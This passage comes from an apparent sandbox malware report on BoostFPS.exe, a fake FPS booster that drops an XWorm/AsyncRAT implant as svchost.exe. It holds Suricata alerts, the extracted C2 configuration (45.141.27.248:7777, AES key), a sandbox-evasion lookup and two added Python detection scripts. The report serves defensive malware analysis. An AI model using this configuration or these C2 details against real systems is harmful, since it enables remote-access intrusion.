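                hits[ev["pid"]].append(name)
    return {pid: names for pid, names in hits.items() if names}


if __name__ == "__main__":
    for pid, names in sorted(triage(EVENTS).items()):
        print(pid, ", ".join(names))
```

Run stand-alone it prints one line per flagged PID; the control record (pid 1234, a real System32 svchost.exe started by services.exe) produces nothing, while pid 7160 alone trips four rules, which is the shape of the "Drops PE files with benign system names" and "Suspect Svchost Activity" signatures above.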
Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-20T10:38:23.025464+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.27.248 | 7777 | 192.168.2.5 | 49979 | TCP
2024-11-20T10:38:30.155148+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.27.248 | 7777 | 192.168.2.5 | 49979 | TCP
2024-11-20T10:38:37.774760+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.27.248 | 7777 | 192.168.2.5 | 49979 | TCP
2024-11-20T10:38:52.524533+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.27.248 | 7777 | 192.168.2.5 | 49979 | TCP
2024-11-20T10:39:00.152420+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.27.248 | 7777 | 192.168.2.5 | 49979 | TCP
2024-11-20T10:39:07.971525+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.27.248 | 7777 | 192.168.2.5 | 49979 | TCP
2024-11-20T10:38:23.234175+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49979 | 45.141.27.248 | 7777 | TCP
2024-11-20T10:38:37.779144+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49979 | 45.141.27.248 | 7777 | TCP
2024-11-20T10:38:52.684134+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49979 | 45.141.27.248 | 7777 | TCP
2024-11-20T10:39:07.972978+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49979 | 45.141.27.248 | 7777 | TCP
2024-11-20T10:38:30.155148+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 45.141.27.248 | 7777 | 192.168.2.5 | 49979 | TCP
2024-11-20T10:39:00.152420+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 45.141.27.248 | 7777 | 192.168.2.5 | 49979 | TCP
2024-11-20T10:38:22.520365+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49979 | 45.141.27.248 | 7777 | TCP
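All of the alerts above sit on one TCP flow between the sandbox (192.168.2.5:49979) and 45.141.27.248:7777, which is exactly the C2 address and port in the extracted XWorm configuration, and the client-side check-ins (SID 2852923) recur roughly every 15 seconds. The script below is an added example, not part of the Joe Sandbox report: it correlates the alert rows with the configuration to confirm that every alerted remote endpoint is a configured C2, estimates the beacon period from the client check-in timestamps, and flags the ip-api.com "hosting" lookup from the Networking section as a datacenter/sandbox check. The alert tuples, SID names, HTTP request and config dictionary are copied from this report; the local-network prefix and the set of IP-lookup services are assumptions.

```python
"""Correlate this report's Suricata alerts and HTTP requests with the extracted XWorm config.

Added example, not part of the Joe Sandbox report. ALERTS, HTTP_REQUESTS, SID_NAMES
and CONFIG are transcribed from the report's tables; LOCAL_PREFIX and GEOIP_SERVICES
are assumptions.
"""
from datetime import datetime
from statistics import median

CONFIG = {"C2 url": ["45.141.27.248"], "Port": 7777, "Aes key": "<123456789>",
          "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

SID_NAMES = {
    2855924: "ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound",
    2852870: "ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes",
    2852923: "ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)",
    2852874: "ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2",
}

# (timestamp, sid, src_ip, src_port, dst_ip, dst_port), transcribed from the alert table
ALERTS = [
    ("2024-11-20T10:38:22.520365+0100", 2855924, "192.168.2.5", 49979, "45.141.27.248", 7777),
    ("2024-11-20T10:38:23.025464+0100", 2852870, "45.141.27.248", 7777, "192.168.2.5", 49979),
    ("2024-11-20T10:38:23.234175+0100", 2852923, "192.168.2.5", 49979, "45.141.27.248", 7777),
    ("2024-11-20T10:38:30.155148+0100", 2852870, "45.141.27.248", 7777, "192.168.2.5", 49979),
    ("2024-11-20T10:38:30.155148+0100", 2852874, "45.141.27.248", 7777, "192.168.2.5", 49979),
    ("2024-11-20T10:38:37.774760+0100", 2852870, "45.141.27.248", 7777, "192.168.2.5", 49979),
    ("2024-11-20T10:38:37.779144+0100", 2852923, "192.168.2.5", 49979, "45.141.27.248", 7777),
    ("2024-11-20T10:38:52.524533+0100", 2852870, "45.141.27.248", 7777, "192.168.2.5", 49979),
    ("2024-11-20T10:38:52.684134+0100", 2852923, "192.168.2.5", 49979, "45.141.27.248", 7777),
    ("2024-11-20T10:39:00.152420+0100", 2852870, "45.141.27.248", 7777, "192.168.2.5", 49979),
    ("2024-11-20T10:39:00.152420+0100", 2852874, "45.141.27.248", 7777, "192.168.2.5", 49979),
    ("2024-11-20T10:39:07.971525+0100", 2852870, "45.141.27.248", 7777, "192.168.2.5", 49979),
    ("2024-11-20T10:39:07.972978+0100", 2852923, "192.168.2.5", 49979, "45.141.27.248", 7777),
]
# (Host header, request line), from the Networking section of the report
HTTP_REQUESTS = [("ip-api.com", "GET /line/?fields=hosting HTTP/1.1")]

LOCAL_PREFIX = "192.168."        # assumption: the sandbox's private range
GEOIP_SERVICES = {"ip-api.com"}  # assumption: extend with other IP-lookup hosts seen in the wild


def c2_endpoints(cfg):
    """(host, port) pairs the extracted config says the implant will talk to."""
    return {(host, int(cfg["Port"])) for host in cfg["C2 url"]}


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S.%f%z")


def correlate(alerts, cfg):
    """Per SID: rule name, hit count, flow direction, and whether every remote endpoint is a configured C2."""
    c2 = c2_endpoints(cfg)
    out = {}
    for _, sid, sip, sport, dip, dport in alerts:
        outbound = sip.startswith(LOCAL_PREFIX)
        remote = (dip, dport) if outbound else (sip, sport)
        entry = out.setdefault(sid, {"name": SID_NAMES.get(sid, "unknown"), "count": 0,
                                     "directions": set(), "matches_config": True})
        entry["count"] += 1
        entry["directions"].add("outbound" if outbound else "inbound")
        entry["matches_config"] &= remote in c2
    for entry in out.values():
        entry["direction"] = "mixed" if len(entry["directions"]) > 1 else next(iter(entry["directions"]))
    return out


def checkin_period(alerts, sid):
    """Median gap in seconds between consecutive alerts for one SID (None if fewer than two)."""
    times = sorted(_ts(a[0]) for a in alerts if a[1] == sid)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    return median(gaps) if gaps else None


def hosting_checks(requests):
    """Requests that ask an IP-lookup service whether the egress IP belongs to a hosting provider."""
    flagged = []
    for host, request_line in requests:
        path = request_line.split()[1]
        if host in GEOIP_SERVICES and "hosting" in path.lower():
            flagged.append((host, path))
    return flagged


if __name__ == "__main__":
    for sid, e in correlate(ALERTS, CONFIG).items():
        print(sid, e["count"], e["direction"], e["matches_config"], e["name"])
    print("client check-in period (s):", checkin_period(ALERTS, 2852923))
    print("hosting checks:", hosting_checks(HTTP_REQUESTS))
```

The period estimate (about 15 s for SID 2852923) is what you would feed into a beaconing detector on real traffic; the point of checking matches_config is that an alert whose remote endpoint is not in the extracted configuration would indicate either a second-stage C2 or a false positive, and neither shows up here.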


                  AV Detection

Source: BoostFPS.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\svchost.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: 00000004.00000002.3313721624.00000000025A1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["45.141.27.248"], "Port": 7777, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: C:\Users\user\AppData\Roaming\svchost.exe | ReversingLabs: Detection: 84%
Source: BoostFPS.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\svchost.exe | Joe Sandbox ML: detected
Source: BoostFPS.exe | Joe Sandbox ML: detected
Source: 4.0.svchost.exe.1a0000.0.unpack | String decryptor: 45.141.27.248
Source: 4.0.svchost.exe.1a0000.0.unpack | String decryptor: 7777
Source: 4.0.svchost.exe.1a0000.0.unpack | String decryptor: <123456789>
Source: 4.0.svchost.exe.1a0000.0.unpack | String decryptor: <Xwormmm>
Source: 4.0.svchost.exe.1a0000.0.unpack | String decryptor: XWorm V5.6
Source: 4.0.svchost.exe.1a0000.0.unpack | String decryptor: USB.exe
Source: 4.0.svchost.exe.1a0000.0.unpack | String decryptor: %AppData%
Source: 4.0.svchost.exe.1a0000.0.unpack | String decryptor: svchost.exe
Source: BoostFPS.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: BoostFPS.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49979 -> 45.141.27.248:7777
Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 45.141.27.248:7777 -> 192.168.2.5:49979
Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:49979 -> 45.141.27.248:7777
Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 45.141.27.248:7777 -> 192.168.2.5:49979
Source: C:\Users\user\AppData\Roaming\svchost.exe | Network Connect: 45.141.27.248 7777
Source: C:\Users\user\AppData\Roaming\svchost.exe | Network Connect: 208.95.112.1 80
Source: Malware configuration extractor | URLs: 45.141.27.248
Source: Yara match | File source: 4.0.svchost.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.5:49979 -> 45.141.27.248:7777
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 (Host: ip-api.com, Connection: Keep-Alive)
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | ASN Name: SPECTRAIPSpectraIPBVNL
Source: unknown | DNS query: name: ip-api.com
Source: unknown | TCP traffic detected without corresponding DNS query: 45.141.27.248 (15 connections)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 (Host: ip-api.com, Connection: Keep-Alive)
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: powershell.exe, 0000000E.00000002.2473414490.0000021BD8467000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000E.00000002.2473414490.0000021BD8467000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: BoostFPS.exe, 00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3313721624.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmp, svchost.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000008.00000002.2196208594.000001DBF0263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2291803371.000002243E563000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2447582953.0000021BCFCB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.2179167608.000001DBE041A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2235051244.000002242E718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2349983022.0000021BBFE68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: svchost.exe, 00000004.00000002.3313721624.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2179167608.000001DBE01F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2235051244.000002242E4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2349983022.0000021BBFC41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2515230432.000002705F511000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.2179167608.000001DBE041A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2235051244.000002242E718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2349983022.0000021BBFE68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000E.00000002.2468534296.0000021BD8078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wwoft.com/pkiops/c
Source: powershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000011.00000002.2706955560.0000027077B70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000011.00000002.2706284204.0000027077A55000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 0000000E.00000002.2468534296.0000021BD8078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wwwft.com/pkiops/crProPCA2011_2011-l0a
Source: powershell.exe, 00000011.00000002.2700888169.0000027077893000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://Token.dll
Source: powershell.exe, 00000008.00000002.2179167608.000001DBE01F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2235051244.000002242E4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2349983022.0000021BBFC41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2515230432.000002705F511000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.2201726247.000001DBF867A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.co_
Source: powershell.exe, 00000008.00000002.2196208594.000001DBF0263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2291803371.000002243E563000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2447582953.0000021BCFCB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

Operating System Destruction

Source: C:\Users\user\AppData\Roaming\svchost.exe | Process information set: 01 00 00 00

System Summary

Source: 0.2.BoostFPS.exe.250c800.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.0.svchost.exe.1a0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.BoostFPS.exe.251fc40.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 4_2_00007FF848DAE5D8
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 4_2_00007FF848DA16DE
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 4_2_00007FF848DA1290
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 4_2_00007FF848DA6E72
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 4_2_00007FF848DA60C6
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 4_2_00007FF848DA172B
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 4_2_00007FF848DA20F1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 4_2_00007FF848DA10A5
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 21_2_00007FF848D916DE
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 21_2_00007FF848D920F1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 21_2_00007FF848D91038
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 21_2_00007FF848D91719
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 22_2_00007FF848DB16DE
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 22_2_00007FF848DB20F1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 22_2_00007FF848DB1038
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 22_2_00007FF848DB1719
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 23_2_00007FF848DA16DE
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 23_2_00007FF848DA20F1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 23_2_00007FF848DA1038
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 23_2_00007FF848DA1719
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 24_2_00007FF848D71719
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 24_2_00007FF848D71038
Source: BoostFPS.exe, 00000000.00000002.2101710960.000000001B161000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesvchost.exe4 vs BoostFPS.exe
Source: BoostFPS.exe, 00000000.00000000.2054977502.00000000000D2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameFPS_BY FILMGODX.exe4 vs BoostFPS.exe
Source: BoostFPS.exe, 00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesvchost.exe4 vs BoostFPS.exe
Source: BoostFPS.exe | Binary or memory string: OriginalFilenameFPS_BY FILMGODX.exe4 vs BoostFPS.exe
Source: BoostFPS.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.BoostFPS.exe.250c800.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.0.svchost.exe.1a0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.BoostFPS.exe.251fc40.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: BoostFPS.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BoostFPS.exe, KREREaf5y7YuM0yCltBL1aOyI5Yy16T9MMxdOrdO08a3tMGXNQCNV0oTCmPwJrOMb6GJ1MrKY0eKPJ6Qg4HLKBRSy3cVQWWeb.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, NFaIfEAolBHm9leRATPwGPwni5MWFnZCQHqP.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, NFaIfEAolBHm9leRATPwGPwni5MWFnZCQHqP.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, NFaIfEAolBHm9leRATPwGPwni5MWFnZCQHqP.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.cs | Base64 encoded string: 'iGuLJeMZTCxhiVAFKYKSHLglLWNiQIus7vL8J7X0oSwSdjNYKxTVrNK9MfRMYZ0GRDFoPoHcrgmByAUCsykkalqy9kc7O2Pp', 'HxADIHF9pD5mNHjxilUnSqReNqTHkmpssWQo2nIoNOFTgL48ihvC8v67CvpKBy3hzjf4qW3ijQ1x9wQLSjACQeoMbPqhDn8g', 'm3Rppmws2VW8YFVkUbCs4hhgYoexlQdLAnpzaHgr2ciOgZVtB93VQQdD4LbLiTUsznMkuEDsqZfiAoVfynvcV2gIHrMzBQ1x'
Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.cs | Base64 encoded string: 'iGuLJeMZTCxhiVAFKYKSHLglLWNiQIus7vL8J7X0oSwSdjNYKxTVrNK9MfRMYZ0GRDFoPoHcrgmByAUCsykkalqy9kc7O2Pp', 'HxADIHF9pD5mNHjxilUnSqReNqTHkmpssWQo2nIoNOFTgL48ihvC8v67CvpKBy3hzjf4qW3ijQ1x9wQLSjACQeoMbPqhDn8g', 'm3Rppmws2VW8YFVkUbCs4hhgYoexlQdLAnpzaHgr2ciOgZVtB93VQQdD4LbLiTUsznMkuEDsqZfiAoVfynvcV2gIHrMzBQ1x'
Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.cs | Base64 encoded string: 'iGuLJeMZTCxhiVAFKYKSHLglLWNiQIus7vL8J7X0oSwSdjNYKxTVrNK9MfRMYZ0GRDFoPoHcrgmByAUCsykkalqy9kc7O2Pp', 'HxADIHF9pD5mNHjxilUnSqReNqTHkmpssWQo2nIoNOFTgL48ihvC8v67CvpKBy3hzjf4qW3ijQ1x9wQLSjACQeoMbPqhDn8g', 'm3Rppmws2VW8YFVkUbCs4hhgYoexlQdLAnpzaHgr2ciOgZVtB93VQQdD4LbLiTUsznMkuEDsqZfiAoVfynvcV2gIHrMzBQ1x'
Source: svchost.exe.0.dr, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: svchost.exe.0.dr, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@32/23@1/2
Source: C:\Users\user\Desktop\BoostFPS.exe | File created: C:\Users\user\AppData\Roaming\FPS_BY FILMGODX.bat
Source: C:\Users\user\AppData\Roaming\svchost.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1476:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2656:120:WilError_03
Source: C:\Users\user\Desktop\BoostFPS.exe | Mutant created: \Sessions\1\BaseNamedObjects\miwy40XH7br6fj8ki
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5492:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3608:120:WilError_03
Source: C:\Users\user\AppData\Roaming\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\MYeD7AkariKEQNYO
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_03
Source: C:\Users\user\AppData\Roaming\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: C:\Users\user\Desktop\BoostFPS.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\FPS_BY FILMGODX.bat" "
Source: BoostFPS.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\BoostFPS.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\BoostFPS.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: BoostFPS.exe | ReversingLabs: Detection: 65%
Source: unknown | Process created: C:\Users\user\Desktop\BoostFPS.exe "C:\Users\user\Desktop\BoostFPS.exe"
Source: C:\Users\user\Desktop\BoostFPS.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\FPS_BY FILMGODX.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BoostFPS.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mode.com Mode 100,25
